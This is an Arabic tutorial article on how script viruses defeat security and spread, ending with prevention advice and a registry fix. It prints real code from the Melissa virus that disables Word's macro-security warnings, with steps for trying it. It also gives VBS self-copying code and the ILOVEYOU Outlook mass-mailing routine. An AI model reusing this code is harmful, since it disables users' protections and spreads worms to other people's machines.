تنتشر هذه الفيروسات بأساليب معينة تزيد بزيادة مبتكريها وطرائقهم , مثل الرسائل المسلسلة Chain mail , المخطط الهرمى Pyramid scheme , الدودة Worm , حصان طروادة Trojan .
و نجيب فيما يلى على أهم سؤالين يسألهما المتعاملون مع الكمبيوتر بشأن هذه الفيروسات , وهما :
1 - كيف يكسر الفيروس جدار الأمان أو الحماية Security?
2 - كيف يتكاثر الفيروس وينشر نفسه بأعداد ضخمة على الشبكات
** كسر الأمان?
وبالنسبة لإجابة السؤال الأول فإن هناك طرق عديدة لذلك تقوم على استغلال بعض الثغرات الأمنية فى الأنظمة شائعة الاستخدام مثل مجموعة برامج Microsoft Office , ونرى الآن - عمليا - مثالا لذلك .
الجزء التالى من فيروس ميلسا Melissa الذى صممه ديفيد سميث , و ضرب الشبكة الإنترنت فى 26 /3/1999 وهذا الجزء يمكن تجربته من خلال أى نسخة من برامج Office 97 أو أحدث , وهو يوقف عمل رسالة التحذير عند فتح ملف يحتوى على ماكرو Macro .
** البرمجى Source code
On Error Resume Next
If System.PrivateProfileString (, HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Wo rd\Security, Level) <> Then
CommandBars(Macro).Controls(Security...).Enabled = False
System.PrivateProfileString(, HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security, Level) = 1&
Else
'CommandBars(Tools).Controls(Macro).Enabled = False
Options.ConfirmConversions = (0): Options.VirusProtection = (0): Options.SaveNormalPrompt = (0)
End If
و تقوم هذه الشفرة Code بتغيير إعدادات Settings برنامج وورد لكيلا يلاحظ وجود الفيروس.
فتقوم اولا بفحص نسخة برنامج وورد Word تحت المسار التالى فى التسجيل -:Registry HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security
لكى تتعرف على نسخة وورد المثبتة , ( لاحظ استخدام أمر On Error Resume Next لكى لا تظهر إحدى رسائل الخطأ فى حالة حدوثه , و ينتبه المستخدم لوجود شئ غير طبيعى ) .
وتعديل خيار حماية من فيروس الماكرو Options.VirusProtection بإعطائه القيمة (0) لكى يوقف فاعليته
ابدأ بفتح ملف جديد , ثم اذهب لقائمة أدوات ثم ماكرو ثم محرر Visual Basic وضع الشفرة السابقة فى الحدث Document_Open وقم بتشغيل الشفرة Run .
واحفظ الملف و أغلقه , ثم أعد فتحه مرة أخرى , و هذه المرة لن يظهر التحذير السابق.
لا تنس أخيرا أن تعيد التحذير بعد مسح الملف بالذهاب إلى قائمة أدوات فمنها إلى خيارات ثم اختيار الأمر عام .
** الانتشار
ينتشر الفيروس عن طريق نسخ نفسه أو كتابة نفسه كملف نصى جديد , والوسائل المتاحة لذلك محدودة , وجدير بالذكر أن شركة مايكروسوفت المصنعة قد أزالت الكثير من الدوال Functions فى VBS من أجل أمن النظام System Security , كدالة Kill (file name) الموجودة فى لغتى VB, VBA التى تستخدم فى مسح الملفات , كما أن VBS لا تكتب سوى الملفات النصية Textual التى تستخدم فى تحديد بعض المعلومات لمواقع الإنترنت من الأجهزة العميل Client , مثل ملفات كوكيز كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةs الشائعة.
وفيما يلى طريقة لاستخدام أمر Copy, باشتقاق الكائن Object الخاص بنظام الملفات FileSystemObject , ثم استدعاء الأمر Copy ليقوم بنسخ الملف ذاته إلى مجلد خاص Special folder هو مجلد الملفات المؤقتة Temporary الذى غالبا ما يكون C:\Windows\Temp\
** النص البرمجى Source code
dim fso,c,dirtemp,x
Set fso = CreateObject(Scripting.FileSystemObject)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirtemp & \VBSdemo.vbs)
و يمكن استخدام أى أسلوب عادى مع الأمر Copy مثل الحلقة التكرارية Loop الآتية:
for x = 0 to 5
c.Copy(dirtemp & \VBSdemo & x & .vbs)
next
ولتجربة هذه الشفرة , انشئ ملفا نصيا بالامتداد VBS , و انسخ فيه هذه الشفرة , و سيقوم بترجمتها و تنفيذها برنامج Windows Scripting Host الذى يأتى مع الإعدادات القياسية لويندوز 98 أوإنترنت اكسبلورر 5.
** استغلال أوتلوك
تتمكن بعض الفيروسات من الاستفادة من برنامج أوتلوك Outlook لدعمه للغة VBS , ولذلك, فإن مستخدمى برامج البريد الإلكترونى التى لا تدعم VBS تكون أنظمتهم البريدية فى أمان.
كذلك الحال بالنسبة لمستخدمى خدمة البريد المبنية على الخادم Server-based email مثل بريد Hotmail و Yahoo و مكتوب .
ويتسلل الفيروس إلى قائمة العناوين البريدية المسجلة فى أوتلوك و يكتب رسالته الخاصة ويرفق في طيها نسخة منه على هيئة ملف VBS , ثم يرسلها لكل العناوين المتاحة, ليبدأ ملف VBS المرسل بدوره نفس الرحلة بعد وصوله مباشرة .
وفى الشفرة التالية من فيروس I love you سنرى بعضا من ذلك .
** النص البرمجى Source code
dim out,mal
set out=WScript.CreateObject(Outlook.Application)
set mal=out.CreateItem(0)
mal.Recipients.Add(malead)
mal.Subject = ILOVEYOU
mal.Body = vbcrlf & kindly check the attached LOVELETTER coming from me.
mal.Attachments.Add(dirsystem&\LOVE-LETTER-FOR-YOU.TXT.vbs)
mal.Send
تقوم هذه الشفرة من الفيروس باشتقاق نسخة من أوتلوك وتحم لها فى الذاكرة و تبدأ فى إعداد الرسالة بكتابة اسم المستلم من قائمة المتلقين Recipients وكتابة رأس الموضوع:I LOVE YOU والمحتوى الذى يطلب فتح الملف المرفق , ثم يضيف ملف VBS كملف ملحق Attachment باسم LOVE-LETTER-FOR-YOU.TXT.vbs , وأخيرا يرسل الرسالة .
الوقاية
لا توجد طريقة للوقاية تضمن نسبة نجاح 100 % , فالطرق الجديدة التى يبتكرها منتجو الفيروسات لا يمكن التنبؤ بها , والشركات المصنعة لمضادات الفيروسات Antivirus نفسها لا تتوقع كل هذه الطرق , و حتى لو صنعت أمصالها المضادة فى وقت يسير , فيكفى ساعات محدودة لانتشار هذه الفيروسات التى تتزايد بتتابع أسى exponential .
و على المستخدم إذا أن يكون حريصا فى التعامل مع ملفات VBS , و يمكن أيضا استخدام النص التالى فى تعديل (التسجيل) لكى يفتح هذه الملفات ويضع محتوياتها فى برنامج المفكرة NotePad , بدلا من تنفيذها مباشرة .
REGEDIT4
//
// Copyright c 2000 Steven John Mapua
// Freely distribute
//
[HKEY_CLASSES_ROOT\.VBS]
@=txtfile
Original_Default=VBSFile
احفظ النص عاليه فى ملف نصى و غير الامتداد إلى reg مثل vbsfix.reg و عند النقر على الملف سيقوم بالتعديل المطلوب ( ربما يسألك الموافقة على التعديل أولا )
=====
لنا لقاء